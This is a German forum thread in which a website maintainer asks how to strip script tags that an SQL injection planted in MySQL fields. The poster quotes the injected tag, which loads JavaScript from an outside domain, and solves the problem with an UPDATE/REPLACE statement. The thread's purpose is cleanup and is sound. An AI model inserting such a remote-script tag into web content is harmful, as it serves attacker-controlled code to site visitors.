Information ausblenden
Willkommen im Forum für alle Datenbanken! Registriere Dich kostenlos und diskutiere über DBs wie Mysql, MariaDB, Oracle, Sql-Server, Postgres, Access uvm

Bestimmte Zeichenkette aus mysql-db-feldern entfernen

Dieses Thema im Forum "MySQL und MariaDB" wurde erstellt von bastooo, 27 Dezember 2019.

  1. bastooo

    bastooo Neuer Benutzer

    Hallo liebe sql-Checker!

    ich hab die Suchfunktion genutzt aber noch nicht wirklich was in Richtung meines Problemes gefunden. Ich habe keine richtigen sql-Kenntnisse, betreue aber noch eine Webseite.

    Gibt es einen SQL-Befehl bei dem man bestimmte Zeichen (zB <script src="..." etc) aus allen DB-Zeilen löschen kann bei denen diese in einem Feld stehn? Ja wir hatten einen Hack mit sql-injection aber keine saubere, aktuelle Sicherung. Wir haben auch nicht die Ressourcen neu aufzusetzen.

    Wäre übergücklich wenn mir jemand helfen könnte und ich nicht alle Zeile händisch durchgehen müsste..
    Freue mich natürlich auch über einen passenden Post wenn schon vorhanden!

    Danke und schönen Abend :)
     

    Anhänge:

  2. akretschmer

    akretschmer Datenbank-Guru

    schau mal in

    Suchen und löschen von unterschiedlichen Codes

    hier in diesem Forum, da war die Aufgabe ähnlich.


     
  3. akretschmer

    akretschmer Datenbank-Guru

    Komplett neu aufsetzen wäre aber die beste Lösung. Und für die Zukunft: Backups.
     
  4. bastooo

    bastooo Neuer Benutzer

    Danke für die schnelle Antwort!!

    Kannst du mir vielleicht sagen, wie ich diesen String, maskieren/eingeben muss, damit das mit Syntax hinhaut?

    <script src='https://hotopponents.site/site.js?tp=2' type='text/javascript'></script>

    Habs grad mit Backlsash probiert, aber ohne Erfolg - muss ich alle Sonderzeichen mit \ maskieren?

    LG
     
  5. bastooo

    bastooo Neuer Benutzer

    Habs hinbekommen mit

    UPDATE tabelle
    SET feld = REPLACE(feld, '<script src=\'###\' type=\'text/javascript\'></script>', '')

    Danke für den Hinweis nochmal!
     
Die Seite wird geladen...

Diese Seite empfehlen

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden